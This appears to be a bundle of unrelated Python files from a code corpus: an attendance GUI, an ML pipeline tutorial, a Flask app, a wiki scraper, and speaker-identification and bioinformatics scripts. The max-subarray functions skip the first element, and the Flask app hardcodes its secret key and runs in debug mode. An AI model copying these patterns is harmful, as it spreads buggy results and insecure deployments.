 +{"seq_id":"600247569","text":"def maxsubrangesum5(x):\n\tmaxsofar = 0\n\tmaxsuffixsum = 0\n\n\t# NB: the scan starts at index 1, so x[0] never enters a sum\n\tfor i in range(1, len(x)):\n\t\tmaxsuffixsum = max(0, maxsuffixsum + x[i])\n\t\tmaxsofar = max(maxsofar, maxsuffixsum)\n\n\treturn maxsofar\n\ndef maxsubrangesum6(x):\n\tmaxsofar = 0\n\tmaxsuffixsum = 0\n\tstartingPosition = 0\n\tendingPosition = 0\n\tendingPositionDecided = True\n\tpossibleStartPosition = 0\n\tfor i in range(1, len(x)):\n\t\tprevmaxsuffixsum = maxsuffixsum\n\t\tprevmaxsofar = maxsofar\n\t\tmaxsuffixsum = max(0, maxsuffixsum + x[i])\n\t\tmaxsofar = max(maxsofar, maxsuffixsum)\n\t\tif prevmaxsuffixsum == 0 and maxsuffixsum != 0:\n\t\t\tpossibleStartPosition = i\n\t\tif prevmaxsofar != maxsofar:\n\t\t\tstartingPosition = possibleStartPosition\n\t\t\tendingPositionDecided = False\n\t\tif prevmaxsuffixsum < maxsuffixsum and not endingPositionDecided:\n\t\t\tendingPosition = i\n\t\t\tendingPositionDecided = True\n\n\treturn [maxsofar, startingPosition, endingPosition]\n\narr = [-2, 1, 5, -4, -22, 4, 10, 8, 1, -8, 3, 4]\n\nprint(maxsubrangesum5(arr))\nprint(maxsubrangesum6(arr))\n","sub_path":"maxSubrangeSum.py","file_name":"maxSubrangeSum.py","file_ext":"py","file_size_in_byte":991,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"575503086","text":"from PyQt5 import QtWidgets,QtCore\nimport sys\nimport os\nimport sip\nfrom db_connection import clear_scan, search_request, fetch_items, add_request, update_budget, fetch_budget, delete_request, search_request_delete, reduce_quantity_scan, reduce_quantity_item, increase_quantity_item, search_request_delete_item\nfrom PyQt5.QtGui import QIcon, QPixmap\nimport datetime\n\nclass window(QtWidgets.QMainWindow):\n def __init__(self):\n super(window,self).__init__()\n centwid=QtWidgets.QWidget()\n\n self.mylineEdit = QtWidgets.QLineEdit()\n\n f = self.mylineEdit.font()\n f.setPointSize(24) # sets the point size to 24\n self.mylineEdit.setFont(f)\n\n\n self.mylineEdit2 = QtWidgets.QLineEdit()\n\n\n self.startNew=1\n #initialise to empty string on start up\n self.mylineEdit.setText(' ')\n self.toggle = False\n\n #barcode scans here and then a returnPressed is registered\n\n #connect to a function\n self.mylineEdit.returnPressed.connect(self.set_sample_name) #here is where I want to delete the previous entry without backspacing by hand\n self.mylineEdit.textChanged.connect(self.delete_previous)\n\n\n total, items = fetch_items()\n print(str(total))\n self.v_box = QtWidgets.QVBoxLayout()\n message = QtWidgets.QLabel(centwid)\n f = message.font()\n f.setPointSize(7) # sets the point size to 7\n f.setBold(True)\n message.setFont(f)\n\n self.v_box.addWidget(message)\n\n\n\n self.v_box.addStretch()\n self.v_box.addStretch()\n self.v_box.addStretch()\n\n curr_budget = fetch_budget()\n curr_budget = curr_budget[0]\n\n self.welcome = QtWidgets.QLabel(centwid)\n self.welcome.setText(\"CCS ATTENDANCE\")\n f = self.welcome.font()\n f.setPointSize(24) # sets the point size to 24\n f.setBold(True)\n self.welcome.setFont(f)\n\n\n\n\n self.le = QtWidgets.QLineEdit()\n g = self.le.font()\n g.setPointSize(24) # sets the point size to 24\n self.le.setFont(g)\n\n self.budget = QtWidgets.QPushButton('Create/Update Event')\n self.budget.setSizePolicy(\n QtWidgets.QSizePolicy.Preferred,\n QtWidgets.QSizePolicy.Expanding)\n\n\n self.done = QtWidgets.QPushButton('Exit')\n self.done.setSizePolicy(\n QtWidgets.QSizePolicy.Preferred,\n QtWidgets.QSizePolicy.Expanding)\n\n\n self.budget_status = QtWidgets.QLabel(centwid)\n self.budget_status.setText(\"EVENT: \")\n f = self.budget_status.font()\n f.setPointSize(10) # sets the point size to 10\n f.setBold(True)\n self.budget_status.setFont(f)\n\n self.message1 = 
QtWidgets.QLabel(centwid)\n self.message1.setText(\"ID NUMBER: \")\n f = self.message1.font()\n f.setPointSize(10) # sets the size to 27\n f.setBold(True)\n self.message1.setFont(f)\n\n\n self.message2 = QtWidgets.QLabel(centwid)\n self.message2.setText(\"STUDENT NAME: \")\n f = self.message2.font()\n f.setPointSize(10) # sets the size to 27\n f.setBold(True)\n self.message2.setFont(f)\n\n self.date = datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M\")\n\n self.message3 = QtWidgets.QLabel(centwid)\n self.message3.setText(\" \")\n\n self.message4 = QtWidgets.QLabel(centwid)\n self.message4.setText(\"DATE: \" + str(self.date))\n f = self.message4.font()\n f.setPointSize(10) # sets the size to 27\n f.setBold(True)\n self.message4.setFont(f)\n\n self.budget_message = QtWidgets.QLabel(centwid)\n\n\n # self.budget_message.setText(\"Budget Status: \" + str(status))\n f = self.budget_message.font()\n f.setPointSize(10) # sets the size to 27\n f.setBold(True)\n self.budget_message.setFont(f)\n\n self.v_box1 =QtWidgets.QVBoxLayout()\n\n\n # Create widget\n self.label = QtWidgets.QLabel(self)\n pixmap = QPixmap('logo.jpg')\n self.label.setPixmap(pixmap)\n\n\n self.v_box1.addWidget(self.welcome)\n self.v_box1.addWidget(self.label)\n self.v_box1.addWidget(self.le)\n self.v_box1.addWidget(self.budget)\n # # self.v_box1.addWidget(self.budget_message)\n self.v_box1.addWidget(self.message4)\n self.v_box1.addWidget(self.budget_status)\n self.v_box1.addWidget(self.message1)\n self.v_box1.addWidget(self.message2)\n self.v_box1.addWidget(self.mylineEdit)\n self.v_box1.addWidget(self.message3)\n self.v_box1.addWidget(self.done)\n self.v_box1.addStretch()\n self.v_box1.addStretch()\n\n\n\n lay=QtWidgets.QHBoxLayout()\n\n\n\n \n lay.addLayout(self.v_box1)\n lay.addLayout(self.v_box)\n \n\n\n centwid.setLayout(lay)\n self.budget.clicked.connect(self.btn_click)\n self.done.clicked.connect(self.btn_click3)\n \n self.setCentralWidget(centwid)\n\n self.show()\n\n def btn_click(self):\n \n sender = self.sender()\n\n if self.le.text() != '':\n\n if sender.text() == 'Create/Update Event':\n if self.toggle is True:\n print(self.le.text())\n budget = self.le.text()\n self.budget_status.setText(\"EVENT: \" + str(budget))\n self.le.hide()\n self.toggle = False\n else:\n self.toggle = True\n self.le.show()\n else:\n \tself.budget_status.setText(\"No Event Input\")\n\n\n def btn_click1(self):\n sender = self.sender()\n item = sender.text()\n item = item.split('-')[0]\n item = item.strip()\n item, quantity = search_request_delete(item)\n if item is False: \n \tdelete_request(item)\n \tself.restart_program()\n else:\n print(str(quantity))\n if int(quantity) == 1:\n delete_request(item)\n else:\n reduce_quantity_scan(item)\n increase_quantity_item(item)\n self.restart_program()\n\n def btn_click3(self):\n QtWidgets.QMessageBox.about(self, \"\",\"Attendance Taking Finished!\")\n app.quit()\n\n #set the sample name variable\n def set_sample_name(self):\n self.sample_name = self.mylineEdit.text()\n print(self.sample_name)\n request = search_request(self.sample_name)\n if request is not False:\n item, value = search_request(self.sample_name)\n if value == '':\n value = ''\n\n\n budget = self.le.text()\n print(str(item) + '-' + str(value))\n added = add_request(str(item), str(value), str(budget), str(self.date))\n if added:\n increase_quantity_item(str(item))\n self.restart_program()\n self.startNew=1\n self.message1.setText(\"ID NUMBER: \" + str(value))\n self.message2.setText(\"STUDENT NAME: \" + str(item))\n 
self.message3.setText(\"Attendance Taken\")\n else:\n self.restart_program()\n self.startNew\n self.message1.setText(\"ID NUMBER: \" + str(value))\n self.message2.setText(\"STUDENT NAME: \" + str(item))\n self.message3.setText(\"Attendance taken for this event!\") \n else:\n self.message3.setText(\"Student does not exist\")\n self.startNew=1\n\n def delete_previous(self,text):\n if self.startNew:\n self.mylineEdit.setText(text[-1])\n self.startNew=0\n\n\n def clearLayout(self, layout):\n if layout is not None:\n while layout.count():\n item = layout.takeAt(0)\n widget = item.widget()\n if widget is not None:\n widget.deleteLater()\n else:\n self.clearLayout(item.layout())\n\n def restart_program(self):\n\n \n total, items = fetch_items()\n print(items)\n\n self.clearLayout(self.v_box)\n \n\n\n item, value = search_request(self.sample_name)\n\n self.message2.setText(\"STUDENT NAME: \" + str(item))\n f = self.message2.font()\n f.setPointSize(10) # sets the size to 27\n f.setBold(True)\n self.message2.setFont(f)\n\n\n\n\n \n\napp=QtWidgets.QApplication(sys.argv)\n\nex=window()\nex.setWindowTitle('EC Attendance')\nex.setGeometry(100, 100, 800, 480)\nsys.exit(app.exec_())\n","sub_path":"Attendance/attendance.py","file_name":"attendance.py","file_ext":"py","file_size_in_byte":8540,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"236936166","text":"# pyre-ignore-all-errors\nimport unittest\nfrom typing import Callable, Iterable, Iterator, List, TypeVar\n\n\nclass BasicTestCase(unittest.TestCase):\n def test_parameter_specification(self):\n try:\n from .. import ParameterSpecification\n from ..type_variable_operators import (\n KeywordArgumentsOf,\n PositionalArgumentsOf,\n )\n\n TParams = ParameterSpecification(\"TParams\")\n TReturn = TypeVar(\"T\")\n\n def listify(\n f: Callable[TParams, TReturn]\n ) -> Callable[TParams, List[TReturn]]:\n def wrapped(\n *args: PositionalArgumentsOf[TParams],\n **kwargs: KeywordArgumentsOf[TParams]\n ):\n return [f(*args, **kwargs)]\n\n return wrapped\n\n except Exception:\n self.fail(\"ParameterSpecification missing or broken\")\n\n def test_list_variadics(self):\n try:\n from .. import ListVariadic\n from ..type_variable_operators import Map\n\n TReturn = TypeVar(\"T\")\n Ts = ListVariadic(\"Ts\")\n\n def better_map(\n func: Callable[[Ts], TReturn], *args: Map[Iterable, Ts]\n ) -> Iterator[TReturn]:\n return map(func, *args)\n\n except Exception:\n self.fail(\"ListVariadics missing or broken\")\n\n def test_none_throws(self):\n try:\n from .. 
import none_throws\n\n none_throws(0)\n none_throws(0, \"custom message\")\n except Exception:\n self.fail(\"none_throws missing or broken\")\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","sub_path":"pyre_extensions/tests/simple_tests.py","file_name":"simple_tests.py","file_ext":"py","file_size_in_byte":1711,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"}
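The pyre-extensions record above predates PEP 612; its `listify` test is expressible today with standard-library typing, which makes a useful translation key when reading the old operator names:

```python
# PEP 612 equivalent of the record's ParameterSpecification test
# (typing.ParamSpec ships with Python 3.10+).
from typing import Callable, List, ParamSpec, TypeVar

P = ParamSpec("P")
R = TypeVar("R")

def listify(f: Callable[P, R]) -> Callable[P, List[R]]:
    def wrapped(*args: P.args, **kwargs: P.kwargs) -> List[R]:
        return [f(*args, **kwargs)]
    return wrapped

@listify
def double(x: int) -> int:
    return x * 2

assert double(3) == [6]
```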
 +{"seq_id":"96028227","text":"from sklearn.datasets import fetch_openml\r\nfrom sklearn import preprocessing\r\nfrom sklearn.impute import SimpleImputer\r\nfrom sklearn.compose import ColumnTransformer\r\nfrom sklearn.model_selection import train_test_split\r\nfrom sklearn.pipeline import Pipeline\r\nfrom sklearn.preprocessing import OneHotEncoder\r\nfrom sklearn.ensemble import RandomForestClassifier\r\nfrom sklearn.model_selection import GridSearchCV\r\nfrom sklearn.svm import SVC\r\nfrom sklearn.inspection import permutation_importance\r\n\r\nimport matplotlib.pyplot as plt\r\nimport pandas as pd\r\n\r\n# Pipeline + feature importance\r\n# Pipeline is needed to determine importance of categorical features, see:\r\n# https://scikit-learn.org/stable/auto_examples/inspection/plot_permutation_importance.html\r\n# We do not want the importance of every level of a categorical feature (e.g. gender_male, gender_female),\r\n# but the importance of a categorical feature in total (e.g. gender)\r\n\r\n#############\r\n# Read data #\r\n#############\r\n# Get data from openml\r\nX, y = fetch_openml(\"titanic\", version=1, as_frame=True, return_X_y=True)\r\n\r\n# Write data to disk\r\nX.join(y).to_csv('data/titanic.csv', index = False)\r\n\r\n# Selected categorical and numeric predictors\r\npredictors_cat = ['pclass', 'sex', 'embarked']\r\npredictors_num = ['age', 'sibsp', 'parch', 'fare']\r\npredictors = predictors_num + predictors_cat\r\nX = X[predictors]\r\n\r\n# Split in train and test\r\nX_train, X_test, y_train, y_test = train_test_split(\r\n X, y, stratify=y, random_state=100, test_size=0.2)\r\n\r\n# Check if dataset has missing values\r\npd.isnull(X).sum()\r\n\r\n# Create scaler and fit on training set, \r\n# so scaling parameters of training set are used on test set\r\nscaler = preprocessing.StandardScaler().fit(X_train[predictors_num])\r\n\r\n# Create pipeline for categorical and numerical predictors\r\ncategorical_pipe = Pipeline([\r\n ('imputer', SimpleImputer(strategy='constant', fill_value='missing')),\r\n ('onehot', OneHotEncoder(handle_unknown='ignore'))\r\n])\r\n\r\nnumerical_pipe = Pipeline([\r\n ('imputer', SimpleImputer(strategy='mean')),\r\n ('scaler', scaler)\r\n])\r\n\r\n# Preprocessing\r\npreprocessing = ColumnTransformer(\r\n [('cat', categorical_pipe, predictors_cat),\r\n ('num', numerical_pipe, predictors_num)])\r\n\r\n# Note that preprocessing can be used on the data as:\r\nX_train_2 = preprocessing.fit_transform(X_train)\r\n# transform only: reuse the imputation/encoding fitted on the training data\r\nX_test_2 = preprocessing.transform(X_test)\r\n\r\n# Add column names to X_train_2 with:\r\n# preprocessing.get_feature_names()\r\n# But that gives an error\r\n# See: https://github.com/scikit-learn/scikit-learn/issues/12525\r\n# and https://github.com/scikit-learn/scikit-learn/issues/6425\r\n\r\n##########################\r\n# Permutation importance #\r\n##########################\r\ndef plot_importance(model, X_test, y_test, n_repeats=10, n_jobs=2):\r\n result = permutation_importance(model, X_test, y_test, \r\n n_repeats=n_repeats, n_jobs=n_jobs)\r\n sorted_idx = result.importances_mean.argsort()\r\n fig, ax = plt.subplots()\r\n ax.boxplot(result.importances[sorted_idx].T,\r\n vert=False, labels=X_test.columns[sorted_idx])\r\n ax.set_title(\"Permutation Importances (test set)\")\r\n fig.tight_layout()\r\n plt.show()\r\n \r\n#####################\r\n# Random forest fit #\r\n#####################\r\npipeline_rf = Pipeline(steps=[\r\n ('preprocess', preprocessing),\r\n ('classifier', RandomForestClassifier(random_state=0, n_estimators=100))\r\n])\r\n\r\nrf = pipeline_rf.fit(X_train, y_train)\r\n\r\n# Accuracy\r\nprint(\"RF train accuracy: %0.3f\" % rf.score(X_train, y_train))\r\nprint(\"RF test accuracy: %0.3f\" % rf.score(X_test, y_test))\r\n\r\nplot_importance(rf, X_test, y_test, n_repeats=10, n_jobs=2)\r\n\r\n###############################\r\n# SVM + hyperparameter tuning #\r\n###############################\r\n\r\n# Pipeline with Gridsearch\r\n# https://scikit-learn.org/stable/tutorial/statistical_inference/putting_together.html\r\n# Parameters of pipelines can be set using a ‘__’ separated parameter\r\n# https://stackoverflow.com/q/43366561\r\n\r\nsvc_pipeline = Pipeline(steps=[\r\n ('preprocess', preprocessing),\r\n ('classifier', SVC(random_state=0))\r\n])\r\n\r\nparam_grid_svc = [\r\n {'classifier__C': [1, 10, 100], 'classifier__kernel': ['linear']},\r\n {'classifier__C': [1, 10, 100], 'classifier__gamma': [0.1, 0.01], 'classifier__kernel': ['rbf']},\r\n]\r\n\r\nsvc_gridsearch = GridSearchCV(svc_pipeline, param_grid_svc, scoring = 'accuracy').fit(X_train, y_train)\r\n\r\nprint(\"Best parameter (CV score=%0.3f):\" % svc_gridsearch.best_score_)\r\nprint(svc_gridsearch.best_params_)\r\n\r\nsvc_pipeline_best = Pipeline(steps=[\r\n ('preprocess', preprocessing),\r\n ('classifier', SVC(random_state=0, C=1, gamma=0.1, kernel='rbf'))\r\n])\r\n\r\nsvc_best = svc_pipeline_best.fit(X_train, y_train)\r\n\r\n# Accuracy\r\nprint(\"SVM train accuracy: %0.3f\" % svc_best.score(X_train, y_train))\r\nprint(\"SVM test accuracy: %0.3f\" % svc_best.score(X_test, y_test))\r\n\r\nplot_importance(svc_best, X_test, y_test, n_repeats=10, n_jobs=2)\r\n","sub_path":"predictive_modelling/scikit_pipeline_and_permutation_importance.py","file_name":"scikit_pipeline_and_permutation_importance.py","file_ext":"py","file_size_in_byte":4967,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"}
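Why the pipeline matters for the importances, in miniature: `permutation_importance` shuffles the raw columns before they reach the encoder, so a categorical feature scores as one unit rather than one score per one-hot level. A self-contained toy (synthetic data, small forest):

```python
import pandas as pd
from sklearn.compose import ColumnTransformer
from sklearn.ensemble import RandomForestClassifier
from sklearn.inspection import permutation_importance
from sklearn.pipeline import Pipeline
from sklearn.preprocessing import OneHotEncoder

X = pd.DataFrame({'color': ['r', 'g', 'b', 'r', 'g', 'b'] * 10,
                  'size': [1, 2, 3, 4, 5, 6] * 10})
y = (X['size'] > 3).astype(int)

model = Pipeline([
    ('prep', ColumnTransformer([('cat', OneHotEncoder(), ['color'])],
                               remainder='passthrough')),
    ('clf', RandomForestClassifier(n_estimators=20, random_state=0)),
]).fit(X, y)

result = permutation_importance(model, X, y, n_repeats=5, random_state=0)
print(dict(zip(X.columns, result.importances_mean)))  # one score per raw column
```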
 +{"seq_id":"208109547","text":"from flask import (\n\t\tFlask, render_template, flash,\n\t\turl_for, redirect, request\n)\n\n\napp = Flask(__name__)\napp.config.update({\n\t'SECRET_KEY': 'Evolux <3 Python',\n\t'DEBUG': True\n})\n\n\n@app.route(\"/\", methods=['GET', 'POST'])\ndef bar():\n\tif request.method == 'POST':\n\t\t# request.form already carries the POSTed fields\n\t\twith open ('lista_bares.yml','a') as fileOutput:\n\t\t\tif '' not in request.form.values():\n\t\t\t\tdados = ''\n\t\t\t\tfor campo in request.form.values():\n\t\t\t\t\tdados += campo + '\\n'\n\t\t\t\tfileOutput.write(dados)\n\t\t\t\tfileOutput.write('\\n---\\n')\n\t\t\telse:\n\t\t\t\tflash('Coloque todos os dados')\n\t\n\treturn render_template(\"index.html\")\n\n@app.route(\"/lista\")\ndef exibir():\n\tf = open('lista_bares.yml', 'r')\n\tcontents = f.read()\n\tf.close()\n\treturn render_template(\"lista.html\", contents = contents)\n\t\n\n\nif __name__ == \"__main__\":\n app.run()\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":828,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"438129140","text":"#!/usr/bin/python\n#\n# Copyright 2018-2022 Polyaxon, Inc.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nfrom rest_framework import fields, serializers\nfrom rest_framework.exceptions import ValidationError\n\nfrom django.db import IntegrityError\n\nfrom coredb.abstracts.getter import get_project_model\nfrom coredb.api.base.tags import TagsMixin\n\n\nclass ProjectNameSerializer(serializers.ModelSerializer):\n class Meta:\n model = get_project_model()\n fields = (\"name\",)\n\n\nclass ProjectSerializer(serializers.ModelSerializer):\n uuid = fields.UUIDField(format=\"hex\", read_only=True)\n\n class Meta:\n model = get_project_model()\n fields = (\n \"uuid\",\n \"name\",\n \"description\",\n \"tags\",\n \"created_at\",\n \"updated_at\",\n )\n\n\nclass ProjectDetailSerializer(ProjectSerializer, TagsMixin):\n class Meta(ProjectSerializer.Meta):\n fields = ProjectSerializer.Meta.fields + (\n \"readme\",\n \"live_state\",\n )\n\n def update(self, instance, validated_data):\n validated_data = self.validated_tags(\n validated_data=validated_data, tags=instance.tags\n )\n\n try:\n return super().update(instance=instance, validated_data=validated_data)\n except IntegrityError:\n raise ValidationError(\n f\"A project with name {validated_data['name']} already exists.\"\n )\n\n\nclass ProjectCreateSerializer(ProjectSerializer):\n class Meta(ProjectSerializer.Meta):\n fields = ProjectSerializer.Meta.fields + (\"readme\",)\n\n def create(self, validated_data):\n try:\n return super().create(validated_data)\n except IntegrityError:\n raise ValidationError(\n f\"A project with name {validated_data['name']} already exists.\"\n )\n","sub_path":"platform/coredb/coredb/api/projects/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":2368,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"609340572","text":"import os\nimport pickle\nimport numpy as np\nfrom scipy.io.wavfile import read\nfrom test999.test2.speakerfeatures import extract_features\nimport time\n\nsource = \"C:/Users/Ibrag/Desktop/Diplom/Datasets/Dataset2/development_set/\"\nmodelpath = \"C:/Users/Ibrag/Desktop/Diplom/Datasets/Dataset2/speaker_models/\"\ntest_file = \"C:/Users/Ibrag/Desktop/Diplom/Datasets/Dataset2/development_set_test.txt\"\nfile_paths = open(test_file, 'r')\n\ngmm_files = [os.path.join(modelpath, fname) for fname in\n os.listdir(modelpath) if fname.endswith('.gmm')]\n\n# Load the Gaussian gender Models\nmodels = [pickle.load(open(fname, 'rb')) for fname in gmm_files]\n# os.path.basename works regardless of the platform's path separator\nspeakers = [os.path.basename(fname).split(\".gmm\")[0] for fname in gmm_files]\n\n# Read the test directory and get the list of test audio files\nfor path in file_paths:\n\n path = path.strip()\n print(path)\n sr, audio = read(source + path)\n vector = extract_features(audio, sr)\n\n log_likelihood = np.zeros(len(models))\n\n for i in range(len(models)):\n gmm = models[i] # checking with each model one by one\n scores = np.array(gmm.score(vector))\n log_likelihood[i] = scores.sum()\n\n winner = np.argmax(log_likelihood)\n print(\"\\tdetected 
as - \", speakers[winner])\n time.sleep(1.0)","sub_path":"Code Python/gmm_ubm/test999/test2/testing.py","file_name":"testing.py","file_ext":"py","file_size_in_byte":1258,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"453019128","text":"#!/usr/bin/env python\n# coding: utf-8\n\nimport html\nimport os\nimport re\n\nimport pandas as pd\nimport requests\n\ntarget_url = {\"jp\": \"http://scp-jp.wikidot.com/foundation-tales-jp\",\n \"en\": \"http://scp-jp.wikidot.com/foundation-tales\",\n \"ru\": \"http://scp-jp.wikidot.com/foundation-tales-ru\",\n \"cn\": \"http://scp-jp.wikidot.com/foundation-tales-cn\",\n \"fr\": \"http://scp-jp.wikidot.com/foundation-tales-fr\",\n \"pl\": 'http://scp-jp.wikidot.com/foundation-tales-pl',\n \"es\": 'http://scp-jp.wikidot.com/foundation-tales-es',\n \"de\": 'http://scp-jp.wikidot.com/foundation-tales-de',\n \"th\": 'http://scp-jp.wikidot.com/foundation-tales-th',\n \"it\": 'http://scp-jp.wikidot.com/foundation-tales-it',\n \"ua\": 'http://scp-jp.wikidot.com/foundation-tales-ua',\n \"pt\": 'http://scp-jp.wikidot.com/foundation-tales-pt',\n \"ko\": 'http://scp-jp.wikidot.com/foundation-tales-ko'\n }\n\nstart_word = {\"jp\": '
アルファベット順著者',\n \"en\": 'アルファベット順著者',\n \"ru\": '著作者順',\n \"cn\": '著作者順',\n \"fr\": '著作者順',\n \"pl\": '著作者順',\n \"es\": '著作者順',\n \"de\": '著作者順',\n \"th\": '著作者順',\n \"it\": '著作者順',\n \"ua\": '著作者順',\n \"pt\": '著作者順',\n \"ko\": '著作者順',\n }\n\nend_word = {\"jp\": 'その他',\n \"en\": 'その他',\n \"ru\": '',\n \"cn\": '',\n \"fr\": '',\n \"pl\": '',\n \"es\": '',\n \"de\": '',\n \"th\": '',\n \"it\": '',\n \"ua\": '',\n \"pt\": '',\n \"ko\": '',\n }\n\n\nexclusion_list = ['#top',\n 'http://scp-jp.wikidot.com/forum/t-6047066/',\n ]\n\n\ndef tale():\n # base directory used for the csv output\n masterpath = os.path.dirname(os.path.abspath(__file__))\n\n urls = []\n titles = []\n authors = []\n brts = []\n\n for key in target_url.keys():\n response = requests.get(target_url[key])\n scp_lines = response.text.splitlines()\n\n # drop markup-only lines that carry no tale data\n for line in scp_lines[:]:\n if re.match(r'^\\s*$', line):\n scp_lines.remove(line)\n elif '⇑' in line:\n scp_lines.remove(line)\n\n # the author listing starts at the heading defined in start_word\n tales_start = 0\n for i, line in enumerate(scp_lines):\n if start_word[key] in line:\n tales_start = i\n break\n\n author = None\n for line in scp_lines[tales_start:]:\n line = html.unescape(line)\n\n # end_word is empty for most branches, so only test it when set\n if end_word[key] and end_word[key] in line:\n break\n\n # author start\n elif '<strong>' in line:\n author = re.search(\"<strong>.*?</strong>\", line)\n if author is not None:\n author = author.group()[8:-9]\n\n if author is None:\n author = re.search(\"<em>.*?</em>\", line)\n if author is not None:\n author = author.group()[4:-5]\n\n if author is None:\n author = \"Unknown pattern of author\"\n\n elif 'return false;\">' in line:\n author = line[line.find('return false;\">') + len('return false;\">'):]\n author = author.split('<')[0]\n\n elif ' does not match any existing user name' in line:\n author = line[:line.find(' does not match any existing user name')]\n author = author.split('>')[-1]\n # author end\n\n # url,title start\n elif any([s for s in exclusion_list if s in line]):\n pass\n\n else:\n if \"<a href=\" in line:\n sp_line = re.split('[<>]', line)\n url = sp_line[3].replace('\"', \"\").replace(\"a href=\", \"\")\n title = sp_line[4]\n\n elif '<a target=_blank href=http://scp-jp.wikidot.com' in line:\n sp_line = re.split('[<>]', line)\n url = sp_line[3].replace('\"', \"\").replace(\n 'a target=_blank href=http://scp-jp.wikidot.com', \"\")\n title = sp_line[4]\n\n elif '• <a href=' in line:\n sp_line = re.split('[<>]', line)\n url = sp_line[3].replace('\"', \"\").replace(\"a href=\", \"\")\n title = sp_line[4]\n\n else:\n continue\n\n if 'http://scp-jp.wikidot.com/' in url:\n url = url.replace(\"http://scp-jp.wikidot.com\", '')\n\n urls.append(url)\n titles.append(title)\n authors.append(author)\n brts.append(key)\n\n print(f\"\\tpage:{key}のデータ取得が完了しました。\")\n\n df = pd.DataFrame(columns=['url', 'title', 'author', 'branches'])\n\n df['url'] = urls\n df['title'] = titles\n df['author'] = authors\n df['branches'] = brts\n df.to_csv(masterpath + \"/data/tale.csv\", header=True, encoding=\"utf-8\")\n\n\nif __name__ == \"__main__\":\n print(\"菖蒲:taleデータベースの更新を更新します。\")\n tale()\n print(\"菖蒲:taleデータベースの更新、完了しました。\")\n","sub_path":"ayame/tales.py","file_name":"tales.py","file_ext":"py","file_size_in_byte":6954,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"}
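The tale scraper above slices raw markup by hand, which is what made it fragile to begin with; several sibling records already lean on BeautifulSoup for the same job. A hedged sketch of the equivalent link extraction (the selector and filtering are illustrative, not taken from the record):

```python
import requests
from bs4 import BeautifulSoup

def tale_links(url):
    soup = BeautifulSoup(requests.get(url).content, 'html.parser')
    for a in soup.select('a[href]'):
        href = a['href']
        if href.startswith('/') and not href.startswith('/forum'):
            yield href, a.get_text(strip=True)
```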
 +{"seq_id":"611770492","text":"#!/usr/bin/env python\n\n#==================================================\n#__________________________________________________\n\n# Copyright 2016 A. Farchi and M. Bocquet\n# CEREA, joint laboratory Ecole des Ponts ParisTech and EDF R&D\n\n# Code for the paper: Using the Wasserstein distance to compare fields of pollutants:\n# Application to the radionuclide atmospheric dispersion of the Fukushima-Daiichi accident\n# by A. Farchi, M. Bocquet, Y. Roustan, A. Mathieu and A. Querel\n\n#__________________________________________________\n#==================================================\n\nfrom OT.utils.sys.argv import extractArgv\nfrom OT.OTObjects2D.configuration import Configuration\nfrom OT.OTObjects2D.analyse.computeOperators import applyAllOperators\n\n# Extract Arguments\narguments = extractArgv()\n\ntry:\n configFile = arguments['CONFIG_FILE']\n config = Configuration(configFile)\n outputDir = config.outputDir\nexcept KeyError:\n outputDir = arguments['OUTPUT_DIR']\n\n# Analyse\napplyAllOperators(outputDir)\n","sub_path":"analyseSimulation2D.py","file_name":"analyseSimulation2D.py","file_ext":"py","file_size_in_byte":1049,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"226810153","text":"#!/usr/bin/python3\nimport sys\nimport os\n\npkg_dir = os.path.dirname( os.path.realpath(__file__) )\npylib_dir = os.path.join( pkg_dir, '..','pylib' )\n\nif os.path.isdir( pylib_dir ):\n print(\"mif-digest: using development library version\")\n sys.path.insert(0,pylib_dir)\n\nimport argparse\nfrom zipfile import ZipFile\n\nimport pymex\n\n#test_mif25='/cluster1/mirrors/imex/intact/psi25/2018/9171338.zip'\ntest_mif25='ftp://ftp.ebi.ac.uk/pub/databases/intact/current/psi25/pmid/2019/15138291.xml'\n\nparser = argparse.ArgumentParser(description='MIF Reader')\nparser.add_argument( '--source', dest=\"source\", type=str, required=True,\n help='MIF file location (path or URL). Compressed file OK.')\nargs = parser.parse_args()\n\nmifParser = pymex.psimi.Mif254Parser()\n\nsource = []\n\nif args.source.endswith( \".zip\" ):\n myzip = ZipFile( args.source, 'r' )\n\n for sl in myzip.namelist():\n print(sl)\n \n # skip 'negative' interaction files\n # ( ie experiments demonstrating interaction does not happen) \n \n if sl.find(\"negative\") < 0 : \n source.append( myzip.open( sl, 'r' ) )\nelse:\n source.append( open(args.source, 'r' ) )\n\naclist = {}\ns = {} \n\nfor cs in source: \n rec = mifParser.parse( cs )\n\n # use a descriptive loop name instead of shadowing the builtin `int`\n for interaction in rec.inlist:\n \n print( \" =======\" ) \n \n itype = interaction.type\n \n method = \"N/S\"\n if interaction.evlist is not None and len(interaction.evlist) > 0:\n intmethod = interaction.evlist[0]['intMth']\n \n print( \"\\n Interaction: label:\\t\",interaction.label,\"\\timexId:\\t\", interaction.imex )\n print( \" Interaction Type: \",itype[\"ac\"],\"\\t\",itype[\"label\"])\n print( \" Method(interaction): \",intmethod[\"ac\"],\"\\t\",intmethod[\"label\"])\n if 'prtMth' in interaction.evlist[0]:\n prtmethod = interaction.evlist[0]['prtMth']\n if prtmethod is not None:\n print( 